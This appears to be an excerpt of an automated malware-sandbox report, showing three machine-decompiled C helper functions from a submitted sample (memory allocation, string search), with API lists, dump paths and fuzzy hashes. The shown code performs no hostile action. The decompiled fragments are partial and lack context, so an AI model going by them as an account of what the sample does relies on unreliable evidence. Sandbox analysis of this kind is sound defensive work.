                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CharPrevlstrlen
                                                                          • String ID: C:\Users\user\Desktop
                                                                          • API String ID: 2709904686-3370423016
                                                                          • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                          • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                                          • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                          • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                          				void* _v0;
                                                                          				void* _t17;
                                                                          				signed int _t19;
                                                                          				void* _t20;
                                                                          				void* _t24;
                                                                          				void* _t26;
                                                                          				void* _t30;
                                                                          				void* _t36;
                                                                          				void* _t38;
                                                                          				void* _t39;
                                                                          				signed int _t41;
                                                                          				void* _t42;
                                                                          				void* _t51;
                                                                          				void* _t52;
                                                                          				signed short* _t54;
                                                                          				void* _t56;
                                                                          				void* _t59;
                                                                          				void* _t61;
                                                                          
                                                                          				 *0x1000406c = _a8;
                                                                          				 *0x10004070 = _a16;
                                                                          				 *0x10004074 = _a12;
                                                                          				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
                                                                          				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
                                                                          				_t17 = E10001243();
                                                                          				_v0 = _t17;
                                                                          				_t52 = _t17;
                                                                          				if( *_t17 == 0) {
                                                                          					L16:
                                                                          					return GlobalFree(_t17);
                                                                          				} else {
                                                                          					do {
                                                                          						_t19 =  *_t52 & 0x0000ffff;
                                                                          						_t42 = 2;
                                                                          						_t54 = _t52 + _t42;
                                                                          						_t61 = _t19 - 0x6c;
                                                                          						if(_t61 > 0) {
                                                                          							_t20 = _t19 - 0x70;
                                                                          							if(_t20 == 0) {
                                                                          								L12:
                                                                          								_t52 = _t54 + _t42;
                                                                          								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
                                                                          								L13:
                                                                          								GlobalFree(_t24);
                                                                          								goto L14;
                                                                          							}
                                                                          							_t26 = _t20 - _t42;
                                                                          							if(_t26 == 0) {
                                                                          								L10:
                                                                          								_t52 =  &(_t54[1]);
                                                                          								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
                                                                          								goto L13;
                                                                          							}
                                                                          							L7:
                                                                          							if(_t26 == 1) {
                                                                          								_t30 = GlobalAlloc(0x40, _t41 + 4);
                                                                          								 *_t30 =  *0x10004040;
                                                                          								 *0x10004040 = _t30;
                                                                          								E10001563(_t30 + 4,  *0x10004074, _t41);
                                                                          								_t59 = _t59 + 0xc;
                                                                          							}
                                                                          							goto L14;
                                                                          						}
                                                                          						if(_t61 == 0) {
                                                                          							L17:
                                                                          							_t33 =  *0x10004040;
                                                                          							if( *0x10004040 != 0) {
                                                                          								E10001563( *0x10004074, _t33 + 4, _t41);
                                                                          								_t59 = _t59 + 0xc;
                                                                          								_t36 =  *0x10004040;
                                                                          								GlobalFree(_t36);
                                                                          								 *0x10004040 =  *_t36;
                                                                          							}
                                                                          							goto L14;
                                                                          						}
                                                                          						_t38 = _t19 - 0x4c;
                                                                          						if(_t38 == 0) {
                                                                          							goto L17;
                                                                          						}
                                                                          						_t39 = _t38 - 4;
                                                                          						if(_t39 == 0) {
                                                                          							 *_t54 =  *_t54 + 0xa;
                                                                          							goto L12;
                                                                          						}
                                                                          						_t26 = _t39 - _t42;
                                                                          						if(_t26 == 0) {
                                                                          							 *_t54 =  *_t54 + 0xa;
                                                                          							goto L10;
                                                                          						}
                                                                          						goto L7;
                                                                          						L14:
                                                                          					} while ( *_t52 != 0);
                                                                          					_t17 = _v0;
                                                                          					goto L16;
                                                                          				}
                                                                          			}






















                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405CD9(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                          				int _v8;
                                                                          				int _t12;
                                                                          				int _t14;
                                                                          				int _t15;
                                                                          				CHAR* _t17;
                                                                          				CHAR* _t27;
                                                                          
                                                                          				_t12 = lstrlenA(_a8);
                                                                          				_t27 = _a4;
                                                                          				_v8 = _t12;
                                                                          				while(lstrlenA(_t27) >= _v8) {
                                                                          					_t14 = _v8;
                                                                          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                          					_t15 = lstrcmpiA(_t27, _a8);
                                                                          					_t27[_v8] =  *(_t14 + _t27);
                                                                          					if(_t15 == 0) {
                                                                          						_t17 = _t27;
                                                                          					} else {
                                                                          						_t27 = CharNextA(_t27);
                                                                          						continue;
                                                                          					}
                                                                          					L5:
                                                                          					return _t17;
                                                                          				}
                                                                          				_t17 = 0;
                                                                          				goto L5;
                                                                          			}










                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                                          • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                          • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                                          • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                          • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%